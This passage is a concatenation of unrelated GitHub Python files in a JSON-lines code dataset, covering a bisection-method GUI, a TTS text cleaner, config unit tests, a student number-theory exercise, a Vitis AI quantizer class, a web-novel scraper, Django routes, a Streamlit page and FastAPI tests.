sticky=\"ew\")\n self.reset_button = CTkButton(\n self, text=\"Reset\", command=master.reset, state=DISABLED)\n self.reset_button.grid(\n row=0, column=1, padx=10, pady=0, sticky=\"ew\")\n\n\nclass App(CTk):\n def __init__(self):\n super().__init__()\n\n self.title(\"Metode Biseksi\")\n self.geometry(\"685x560\")\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(3, weight=1)\n\n self.title_label = CTkLabel(\n self, text=\"Metode Biseksi\", fg_color=\"transparent\", corner_radius=6, font=CTkFont(size=20, weight='bold'))\n self.title_label.grid(row=0, column=0, padx=10,\n pady=(10, 0), sticky=\"ew\")\n\n self.input_frame = InputFrame(self)\n self.input_frame.grid(row=1, column=0, padx=10,\n pady=(10, 0), sticky=\"\")\n\n self.button_frame = ButtonFrame(self)\n self.button_frame.grid(row=2, column=0, padx=10,\n pady=(10, 0), sticky=\"\")\n self.button_frame.configure(fg_color=\"transparent\")\n self.result_frame = None\n\n def calculate(self):\n exp = self.input_frame.get_exp()\n a = self.input_frame.get_a()\n b = self.input_frame.get_b()\n es = self.input_frame.get_es()\n imax = self.input_frame.get_imax()\n\n if (exp == \"\" or a == \"\" or b == \"\" or es == \"\" or imax == \"\"):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Input tidak boleh kosong!\"\n )\n return\n\n exp = str(exp)\n a = float(a)\n b = float(b)\n es = float(es)\n imax = int(imax)\n\n if (b <= a):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Batas Atas tidak boleh kurang dari atau sama dengan Batas Bawah!\"\n )\n return\n\n if (imax < 1):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Iterasi maksimum tidak boleh kurang dari 1!\"\n )\n return\n\n result = bisect(a, b, es, imax, f, exp)\n if (result == -1):\n messagebox.showerror(\n title=\"Syarat tidak terpenuhi!\",\n message=\"f(a).f(b) > 0\\nAkar tidak ditemukan! 
Proses dihentikan.\"\n )\n return\n\n self.result_frame = CTkScrollableFrame(self)\n self.result_frame.grid(row=3, column=0, padx=10,\n pady=10, sticky=\"nsew\")\n\n [res, c, ea, i] = result\n for i in range(len(res)):\n for j in range(len(res[0])):\n entry = CTkEntry(self.result_frame,\n justify=\"center\", corner_radius=0, width=80)\n entry.grid(row=i, column=j)\n entry.insert(0, res[i][j])\n entry.configure(state=DISABLED)\n\n self.button_frame.calc_button.configure(state=DISABLED)\n self.button_frame.reset_button.configure(state=NORMAL)\n messagebox.showinfo(\n title=\"Hasil\",\n message=\"Dihasilkan hampiran akar = {:.6f}\".format(c)\n + \" dengan error = {:.6f}\".format(ea)\n + \" dan iterasi = {}\".format(i)\n )\n\n def reset(self):\n self.result_frame.grid_forget()\n self.input_frame.reset()\n self.button_frame.reset_button.configure(state=DISABLED)\n self.button_frame.calc_button.configure(state=NORMAL)\n\n\ndef main():\n set_appearance_mode(\"dark\")\n set_default_color_theme(\"blue\")\n\n app = App()\n\n app.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MrPuppeteer/bisect","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42699628207","text":"import importlib\nfrom bert_vits2.text import cleaned_text_to_sequence\n\nlanguage_module_map = {\n 'zh': \"bert_vits2.text.chinese\",\n 'ja': \"bert_vits2.text.japanese\"\n}\n\n_loaded_modules = {}\n\n\ndef get_language_module(language):\n if language not in _loaded_modules:\n module_path = language_module_map.get(language)\n if not module_path:\n raise ValueError(f\"Unsupported language: {language}\")\n\n _loaded_modules[language] = importlib.import_module(module_path)\n\n return _loaded_modules[language]\n\n\ndef clean_text(text, language):\n language_module = get_language_module(language)\n norm_text = language_module.text_normalize(text)\n phones, tones, word2ph = language_module.g2p(norm_text)\n return norm_text, phones, tones, word2ph\n\n\ndef clean_text_bert(text, language):\n language_module = get_language_module(language)\n norm_text = language_module.text_normalize(text)\n phones, tones, word2ph = language_module.g2p(norm_text)\n bert = language_module.get_bert_feature(norm_text, word2ph)\n return phones, tones, bert\n\n\ndef text_to_sequence(text, language):\n norm_text, phones, tones, word2ph = clean_text(text, language)\n return cleaned_text_to_sequence(phones, tones, language)\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"NEKOparapa/MeidoAGI","sub_path":"vits/vits-simple-api/bert_vits2/text/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38233652684","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Example usage and tests for :mod:`kleio.core.io.resolve_config`.\"\"\"\n\nimport os\nimport socket\n\nimport pytest\n\nimport kleio.core.io.resolve_config as resolve_config\n\n\n@pytest.fixture\ndef force_is_exe(monkeypatch):\n \"\"\"Mock resolve_config to recognize any string as an executable script.\"\"\"\n def is_exe(path):\n return True\n\n monkeypatch.setattr(resolve_config, \"is_exe\", is_exe)\n\n\ndef test_fetch_default_options():\n \"\"\"Verify default options\"\"\"\n resolve_config.DEF_CONFIG_FILES_PATHS = []\n default_config = resolve_config.fetch_default_options()\n\n assert 
default_config['algorithms'] == 'random'\n assert default_config['database']['host'] == socket.gethostbyname(socket.gethostname())\n assert default_config['database']['name'] == 'kleio'\n assert default_config['database']['type'] == 'MongoDB'\n\n assert default_config['max_trials'] == float('inf')\n assert default_config['name'] is None\n assert default_config['pool_size'] == 10\n\n\ndef test_fetch_env_vars():\n \"\"\"Verify env vars are fetched properly\"\"\"\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {}}\n\n db_name = \"kleio_test\"\n\n os.environ['ORION_DB_NAME'] = db_name\n\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {'name': 'kleio_test'}}\n\n db_type = \"MongoDB\"\n os.environ['ORION_DB_TYPE'] = db_type\n\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {'name': db_name, 'type': db_type}}\n\n\n@pytest.mark.usefixtures(\"version_XYZ\")\ndef test_fetch_metadata_kleio_version():\n \"\"\"Verify kleio version\"\"\"\n metadata = resolve_config.fetch_metadata({})\n assert metadata['kleio_version'] == 'XYZ'\n\n\n@pytest.mark.usefixtures(\"force_is_exe\")\ndef test_fetch_metadata_executable_users_script():\n \"\"\"Verify executable user script with absolute path\"\"\"\n cmdargs = {'user_args': ['A']}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == os.path.abspath('A')\n\n\ndef test_fetch_metadata_non_executable_users_script():\n \"\"\"Verify executable user script keeps given path\"\"\"\n cmdargs = {'user_args': ['A']}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == 'A'\n\n\n@pytest.mark.usefixtures()\ndef test_fetch_metadata_user_args():\n \"\"\"Verify user args\"\"\"\n user_args = list(map(str, range(10)))\n cmdargs = {'user_args': user_args}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == user_args[0]\n assert metadata['user_args'] == user_args[1:]\n\n\n@pytest.mark.usefixtures(\"with_user_tsirif\")\ndef test_fetch_metadata_user_tsirif():\n \"\"\"Verify user name\"\"\"\n metadata = resolve_config.fetch_metadata({})\n assert metadata['user'] == \"tsirif\"\n\n\ndef test_fetch_metadata():\n \"\"\"Verify no additional data is stored in metadata\"\"\"\n metadata = resolve_config.fetch_metadata({})\n len(metadata) == 4\n\n\ndef test_fetch_config_no_hit():\n \"\"\"Verify fetch_config returns empty dict on no config file path\"\"\"\n config = resolve_config.fetch_config({\"config\": \"\"})\n assert config == {}\n\n\ndef test_fetch_config(config_file):\n \"\"\"Verify fetch_config returns valid dictionnary\"\"\"\n config = resolve_config.fetch_config({\"config\": config_file})\n\n assert config['algorithms'] == 'random'\n assert config['database']['host'] == 'mongodb://user:pass@localhost'\n assert config['database']['name'] == 'kleio_test'\n assert config['database']['type'] == 'mongodb'\n\n assert config['max_trials'] == 100\n assert config['name'] == 'voila_voici'\n assert config['pool_size'] == 1\n\n\ndef test_merge_configs_update_two():\n \"\"\"Ensure update on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 3, 'b': 2}\n\n\ndef test_merge_configs_update_three():\n \"\"\"Ensure two updates on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n c = {'b': 4}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 3, 'b': 4}\n\n\ndef 
test_merge_configs_update_four():\n \"\"\"Ensure three updates on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n c = {'b': 4}\n d = {'a': 5, 'b': 6}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 5, 'b': 6}\n\n\ndef test_merge_configs_extend_two():\n \"\"\"Ensure extension on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': 2, 'c': 3}\n\n\ndef test_merge_configs_extend_three():\n \"\"\"Ensure two extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n c = {'d': 4}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': 2, 'c': 3, 'd': 4}\n\n\ndef test_merge_configs_extend_four():\n \"\"\"Ensure three extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n c = {'d': 4}\n d = {'e': 5}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}\n\n\ndef test_merge_configs_update_extend_two():\n \"\"\"Ensure update and extension on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': 3, 'c': 4}\n\n\ndef test_merge_configs_update_extend_three():\n \"\"\"Ensure two updates and extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n c = {'a': 5, 'd': 6}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 5, 'b': 3, 'c': 4, 'd': 6}\n\n\ndef test_merge_configs_update_extend_four():\n \"\"\"Ensure three updates and extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n c = {'a': 5, 'd': 6}\n d = {'d': 7, 'e': 8}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 5, 'b': 3, 'c': 4, 'd': 7, 'e': 8}\n\n\ndef test_merge_sub_configs_update_two():\n \"\"\"Ensure updating to second level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': {'c': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 3}}\n\n\ndef test_merge_sub_configs_sub_update_two():\n \"\"\"Ensure updating on second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'b': {'c': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 3}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'c': 4}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 4, 'd': 3}}\n\n\ndef test_merge_sub_configs_sub_extend_two():\n \"\"\"Ensure updating to third level from second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'d': {'e': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 2}, 'd': {'e': 3}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'e': {'f': 4}}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 2, 'd': 3, 'e': {'f': 4}}}\n\n\ndef test_merge_sub_configs_update_three():\n \"\"\"Ensure updating twice to third level from second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'b': {'c': 3}}\n c = {'b': {'c': {'d': 4}}}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': {'c': {'d': 4}}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'c': 4}}\n c = {'b': {'c': {'e': 5}}}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': {'c': {'e': 5}, 'd': 3}}\n\n\ndef test_infer_versioning_metadata():\n \"\"\"Verify infer_versioning_metadata does nothing so far\n\n Test should be broken once the function 
is implemented\n \"\"\"\n metadata = {'hello': {'world': 0}}\n assert resolve_config.infer_versioning_metadata(metadata) == metadata\n","repo_name":"Epistimio/kleio","sub_path":"tests/unittests/core/io/test_resolve_config.py","file_name":"test_resolve_config.py","file_ext":"py","file_size_in_byte":7885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"1626741819","text":"from numeros import eh_primo\nfrom numeros import lista_primos\nfrom numeros import conta_primos\nfrom numeros import eh_armstrong\nfrom numeros import eh_quase_armstrong\nfrom numeros import lista_armstrong\nfrom numeros import eh_perfeito\nfrom numeros import lista_perfeitos\n\n#Os comentários abaixo representam os resultados esperados pelos testes!\n\nteste_primos = [2, 5, 24, 19, 9, 30, 41]\n#true, true, false, true, false, false, true\nteste_lista_primos = 29\n#[2, 3, 5, 7, 11, 13, 17, 19, 23]\nteste_conta_primos = [97, 11, 8, 15, 11, 53, 11]\n#{11:3 53:1 97:1}\nteste_armstrong = [2, 10, 153, 15, 370, 4, 72]\n#true, false, true, false, true, true, false\nteste_quase_armstrong = [4, 35, 75]\n#false, true, true\nteste_lista_armstrong = 370\n#[1, 2, 3, 4, 5, 6, 7, 8, 9, 153]\nteste_perfeito = [4, 25, 28, 72, 496, 6]\n#false, false, true, false, true, true\nteste_lista_perfeitos = 496\n#[6,28]\n\ndef eh_primo(n):\n mtp=0\n if n>=2:\n for c_nt in range(2,n):\n if (n % c_nt == 0):\n mtp += 1\n if(mtp==0):\n return True\n else:\n return False\n else:\n return False\nprint(\"Teste eh_primo\")\nfor x in teste_primos:\n print(eh_primo(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_primos(n):\n ln = [x for x in range(n)]\n l1 = list()\n l_dl = [x for x in ln if x != 0]\n for nmr in ln:\n tot_d = 0\n for dv in l_dl:\n if nmr % dv == 0:\n tot_d += 1\n elif nmr < dv:\n break\n if tot_d == 2:\n l1.append(nmr)\n return l1\nteste_lista_primos = 29\n# retorno [2, 3, 5, 7, 11, 13, 17, 19, 23]\nprint(\"Teste lista_primos\")\nprint(lista_primos(teste_lista_primos))\nprint(\"\")\n\ndef conta_primos(s):\n dc = dict()\n for aux in sorted(vlr):\n if eh_primo(aux):\n if aux in dc:\n dc[aux] += 1\n else:\n dc[aux] = 1\n return dc\nprint(\"Teste conta_primos\")\nprint(conta_primos(teste_conta_primos))\nprint(\"\")\n\ndef eh_armstrong(n):\n ordn = len(str(n))\n i = 0\n aux = n\n while aux > 0:\n digit = aux % 10\n i += digit ** ordn\n aux //= 10\n if (n == i):\n return True\n else:\n return False\nprint(\"Teste eh_armstrong\")\nfor x in teste_armstrong:\n print(eh_armstrong(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef eh_quase_armstrong(n):\n ordn = len(str(n))\n i = 0\n xuxa = n\n while xuxa > 0:\n digit = xuxa % 10\n i += digit ** ordn\n xuxa //= 10\n if (n == i-1)or(n==i+1)and(n>=0):\n return True\n else:\n return False\nprint(\"Teste eh_quase_armstrong\")\nfor x in teste_quase_armstrong:\n print(eh_quase_armstrong(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_armstrong(n):\n l_1=list()\n soma=0\n for val in range(1,n-1):\n if(eh_armstrong(val)):\n l_1.append(val)\n elif(eh_armstrong==False):\n break\n return l_1\nprint(\"Teste lista_armstrong\")\nprint(lista_armstrong(teste_lista_armstrong))\nprint(\"\")\n\ndef eh_perfeito(n):\n totovs = 0\n for dv in range(1,n):\n if n % dv == 0:\n totovs += dv\n if n == totovs:\n return True\n else:\n return False\nprint(\"Teste eh_perfeito\")\nfor x in teste_perfeito:\n print(eh_perfeito(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_perfeitos(n):\n l_1=list()\n soma=0\n for val in range(1,n-1):\n 
if(lista_perfeitos(val)):\n l_1.append(val)\n elif(lista_perfeitos==False):\n break\n return l_1\nprint(\"Teste lista_perfeitos\")\nprint(lista_perfeitos(teste_lista_perfeitos))\n\n","repo_name":"Erik-Masck/Exercicios-Python","sub_path":"test_numeros.py","file_name":"test_numeros.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11457091272","text":"from tensorflow_model_optimization.python.core.quantization.keras.vitis.base import quantize_strategy\nfrom tensorflow_model_optimization.python.core.quantization.keras.vitis.utils import common_utils\n\nQuantizeStrategy = quantize_strategy.QuantizeStrategy\nlogger = common_utils.VAILogger\n\n\nclass VitisQuantizeStrategy(QuantizeStrategy):\n \"\"\"Vitis Quantize Strategy.\"\"\"\n\n def update(self, qs_configs):\n \"\"\"Update the current configurations by overriding.\n\n Args:\n new_config: String, file name of the new quantize strategy configurations.\n\n Returns:\n None\n \"\"\"\n\n if 'optimize_pipeline_config' in qs_configs:\n self._optimize_pipeline.update(qs_configs.pop('optimize_pipeline_config'))\n if 'quantize_pipeline_config' in qs_configs:\n self._quantize_pipeline.update(qs_configs.pop('quantize_pipeline_config'))\n if 'refine_pipeline_config' in qs_configs:\n self._refine_pipeline.update(qs_configs.pop('refine_pipeline_config'))\n if 'finalize_pipeline_config' in qs_configs:\n self._finalize_pipeline.update(qs_configs.pop('finalize_pipeline_config'))\n if 'quantize_registry_config' in qs_configs:\n self._quantize_registry.update(qs_configs.pop('quantize_registry_config'))\n\n invalid_configs = []\n while qs_configs:\n config = qs_configs.popitem()\n if self._quantize_registry.is_valid_config(config):\n self._quantize_registry.update(config)\n elif self._optimize_pipeline.is_valid_config(config):\n self._optimize_pipeline.update(config)\n elif self._quantize_pipeline.is_valid_config(config):\n self._quantize_pipeline.update(config)\n elif self._refine_pipeline.is_valid_config(config):\n self._refine_pipeline.update(config)\n elif self._finalize_pipeline.is_valid_config(config):\n self._finalize_pipeline.update(config)\n else:\n invalid_configs.append(config)\n\n # Check for invalid configurations\n if invalid_configs:\n logger.error('Invalid configs: {}'.format(invalid_configs))\n\n self._qs_configs.update({\n 'quantize_registry_config': self._quantize_registry.get_configs(),\n 'optimize_pipeline_config': self._optimize_pipeline.get_configs(),\n 'quantize_pipeline_config': self._quantize_pipeline.get_configs(),\n 'refine_pipeline_config': self._refine_pipeline.get_configs(),\n 'finalize_pipeline_config': self._finalize_pipeline.get_configs(),\n })\n\n # Interface functions\n def get_configs(self):\n return self._qs_configs\n\n def get_quantize_registry(self):\n \"\"\"Return the quantize registry including the input quantize configurations\n and the detailed configurations for keras and vitis layers.\n\n Args:\n None\n\n Returns:\n A VitisQuantizeRegistry object.\n \"\"\"\n return self._quantize_registry\n\n def get_optimize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the pre-quantization optimization processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._optimize_pipeline\n\n def get_quantize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the main quantization processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return 
self._quantize_pipeline\n\n def get_refine_pipeline(self):\n \"\"\"Return the TransformsPipeline of the post-quantization refinement processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._refine_pipeline\n\n def get_finalize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the finalize processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._finalize_pipeline\n","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_tensorflow2.x/tensorflow_model_optimization/python/core/quantization/keras/vitis/common/vitis_quantize_strategy.py","file_name":"vitis_quantize_strategy.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"18533787319","text":"from logging import getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nimport os\nimport time\nimport datetime\nimport csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta\n\n\ndef main():\n \"\"\"\n メイン処理\n \"\"\"\n # --------------------------------------\n # 作品ページのURLを指定(コメントアウト・コメントインで指定できるようにしています)\n t0=time.time()\n if not os.path.exists(\"corpus\"):\n os.makedirs(\"corpus\")\n\n with open(\"real_list\", \"r\") as n:\n ncode=n.read().splitlines()\n with open(\"log.txt\", 'r') as log:\n x=log.read()\n ncode=ncode[50000:]\n ncode=ncode[int(x):]\n\n for i, nc in enumerate(ncode):\n url = 'https://ncode.syosetu.com/{}/'.format(nc)\n stories = \"\"\n bs_obj = make_bs_obj(url)\n if bs_obj is None:\n continue\n else:\n pass\n time.sleep(1)\n\n url_list = [\"https://ncode.syosetu.com\" + a_bs_obj.find(\"a\").attrs[\"href\"] for a_bs_obj in bs_obj.findAll(\"dl\", {\"class\": \"novel_sublist2\"})]\n date_list = bs_obj.findAll(\"dt\",{\"class\":\"long_update\"})\n novel_title = bs_obj.find(\"p\",{\"class\":\"novel_title\"}).get_text()\n for s in r'\\/*?\"<>:|':\n novel_title = novel_title.replace(s, '')\n\n # 各話の本文情報を取得\n for j in range(len(url_list)):\n url = url_list[j]\n bs_obj = make_bs_obj(url)\n if bs_obj is None:\n continue\n else:\n pass\n time.sleep(0.3)\n stories = stories + get_main_text(bs_obj)\n \n f = open('corpus/{}.txt'.format(nc), 'w')\n f.write(stories)\n f.close()\n logger.debug('{}.txt is writen.'.format(nc))\n t1=time.time()\n deltat=t1-t0\n timeleft=timedelta(seconds=deltat*(len(ncode)/(i+1)-1))\n logger.debug(f'duration:{timedelta(deltat)}, time left:{timeleft}')\n print(\"進捗:{}/{}, {}%\".format(i, len(ncode), i*100//len(ncode)))\n with open(\"log.txt\", 'w') as log:\n log.write(str(i+int(x)+1))\n\n\n\ndef make_bs_obj(url):\n \"\"\"\n BeautifulSoupObjectを作成\n \"\"\"\n html = urlopen(url)\n logger.debug('access {} ...'.format(url))\n if html is None:\n return None\n else:\n return BeautifulSoup(html,\"html.parser\")\n\ndef get_main_text(bs_obj):\n \"\"\"\n 各話のコンテンツをスクレイピング\n \"\"\"\n text = \"\"\n text_htmls = bs_obj.findAll(\"div\",{\"id\":\"novel_honbun\"})[0].findAll(\"p\")\n\n for text_html in text_htmls:\n text = text + text_html.get_text() + \"\\n\"\n\n return text\n\ndef save_as_csv(stories, nc):\n \"\"\"\n csvファイルにデータを保存\n \"\"\"\n # バックアップファイルの保存先の指定\n directory_name = \"novels\"\n # ディレクトリが存在しなければ作成する\n if not os.path.exists(directory_name):\n os.makedirs(directory_name)\n\n # ファイル名の作成\n csv_name = os.path.join(directory_name, 
'{}.csv'.format(nc))\n\n # 列名(1行目)を作成\n col_name = ['No', 'title', 'url', 'date', 'text']\n\n with open(csv_name, 'w', newline='', encoding='utf-8') as output_csv:\n csv_writer = csv.writer(output_csv)\n csv_writer.writerow(col_name) # 列名を記入\n\n # csvに1行ずつ書き込み\n for story in stories:\n row_items = [story['No'], story['title'], story['url'], story['date'], story['text']]\n csv_writer.writerow(row_items)\n\n print(csv_name, ' saved...')\n\n\n\nmain()\n","repo_name":"uzuki-sae/About_Syousetsuka_ni_narou","sub_path":"get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9393320584","text":"from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom . import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='index'),\n url(r'^login/$', LoginView.as_view(template_name='accounts/login.html'), name='login'),\n url(r'^logout/$', LogoutView.as_view(template_name='accounts/logout.html'), name='logout'),\n url(r'^create/$', views.SignUpView.as_view(), name='create'),\n #url(r'^check/(?P[0-9]+)/$', views.CheckView.as_view(), name='check'),\n #url(r'^update/(?P[0-9]+)/$', views.CorrectView.as_view(), name='update'),\n url(r'^success/$', views.SuccessView.as_view(), name='success'),\n url(r'^profile/$', views.LoginSuccessView.as_view(), name='loginSuccess'),\n url(r'^person/$', views.PersonView.as_view(), name='person')\n]","repo_name":"gitter-badger/LION","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41601476056","text":"import streamlit as st\nfrom data import Data\nfrom models_strategy_pattern.model_types import ModelTypes\n\n''' \n Get tweet embeddings\n\nA very crucial step is to be able to get sentence embeddings in this project. This is important because\nthis project is a big unsupervised problem as it is. Being able to get texts and label them as positive,\nnegative, or neutral. Clustering tweets will also be a thing, and that of course revolves around embeddings\nas well.\n \n'''\n\nclass GetTweetEmbeddings(Data):\n def __init__(self): \n super().__init__()\n \n self.m_details = ''' To understand sentence embeddings, it's worth going over **_word_** embeddings as well. A word\n embedding is basically a vector or numerical representation of a single word and is able to identify the syntaxes.\n Some famous word embedding libraries are Word2Vec, and GloVe, but there's a few more out there. Sentence embeddings\n are basically the same thing except with of course sentences. With sentence embeddings, it's possible to retain context\n in which a certain word was used IN the sentence. '''\n\n self.m_conversion_details = ''' Embeddings for words and sentences are long vectors/arrays/lists of different sizes. A \n typical size for an embedding is 768, especially with more popular models. The idea is that any sentence (or tweet in\n this case) can be a **long** vector of floating point values. This has to be done of course since models don't understand\n text but only numbers. 
'''\n\n \n\n def Display(self):\n print('get_tweet_embeddings.py check 1.')\n st.title('Get Tweets Embeddings')\n\n st.write('')\n st.write('')\n st.write(self.m_details)\n\n st.write('')\n st.write('')\n st.write('')\n st.write('### Convert the tweets into embeddings')\n st.write(self.m_conversion_details)\n \n st.write('')\n st.write('')\n st.write('')\n st.write('### Display the embedded tweets')\n\n st.session_state.m_model_class.Predict() # Argument is a list.\n\n # The model is chosen, now the user can proceed to the next page.\n st.session_state.can_change_page = True\n print('get_tweet_embeddings.py check 2.')\n\n\n\n def ModelCompatibilityCheck(self):\n model_class = st.session_state.m_model_class\n\n if self.ModelTypeCheck(model_class, self.__class__.__name__, ModelTypes.Embedding, True):\n return True\n\n # When the page is going to be skipped, increment variable that controls which class is displayed to get to the proper next class.\n st.session_state.list_index += 1\n \n return False","repo_name":"axiom2018/Live-Twitter-Sentiment-Analysis","sub_path":"get_tweet_embeddings.py","file_name":"get_tweet_embeddings.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8281134766","text":"import datetime\nimport json\nimport re\n\nimport mongomock\nimport pytest\nfrom fastapi.testclient import TestClient\n\nfrom backend.models import UpdateMonitorModel\nfrom shared.models import CheckModel, MonitorModel, ResultModel\nfrom shared.mongo import (MONGO_DB_NAME, MONITORS_COLLECTION_NAME,\n get_prod_client)\n\nfrom ..main import app\n\nmongo_test_client = mongomock.MongoClient()\n\n\ndef get_mongo_test_client():\n return mongo_test_client\n\n\n@pytest.fixture(autouse=True)\ndef run_around_tests(requests_mock):\n app.dependency_overrides[get_prod_client] = get_mongo_test_client\n requests_mock.get(re.compile('/scheduler/*'))\n # clean db before every test\n mongo_test_client.drop_database(MONGO_DB_NAME)\n yield\n\n\n@pytest.fixture()\ndef example_monitor_id():\n return \"666f6f2d6261722d71757578\"\n\n\n@pytest.fixture()\ndef example_monitor(example_monitor_id):\n monitor = MonitorModel(\n description=\"this is a test monitor\",\n url=\"http://httpbin.org/post\",\n method=\"POST\",\n body=\"{\\\"hello\\\":\\\"world\\\"}\",\n checks=CheckModel(expected_status=200),\n results=[ResultModel(status=200, time=datetime.datetime.now(), content='wow',\n duration_ms=5000, headers={}, checked_with=CheckModel(expected_status=200))]\n ).dict()\n\n monitor['_id'] = example_monitor_id\n\n return monitor\n\n\n@pytest.fixture()\ndef example_update_monitor():\n return UpdateMonitorModel(\n description=\"updated_description\",\n url=\"http://httpbin.org/get\",\n method=\"GET\",\n body=\"\",\n checks=CheckModel(expected_status=404)\n ).dict()\n\n\ndef test_now_allowed():\n client = TestClient(app)\n response = client.post('/monitors/v1/getmonitors/false')\n\n assert response.status_code == 405\n\n\n@pytest.mark.parametrize(\"with_results,results_len\", [(False, 0), (True, 1)])\ndef test_with_results(example_monitor, with_results, results_len):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n response = client.get(f'/monitors/v1/getmonitors/{with_results}')\n result = response.json()\n\n assert response.status_code == 200\n assert len(result) == 1\n assert len(result[0]['results']) == results_len\n\n\ndef 
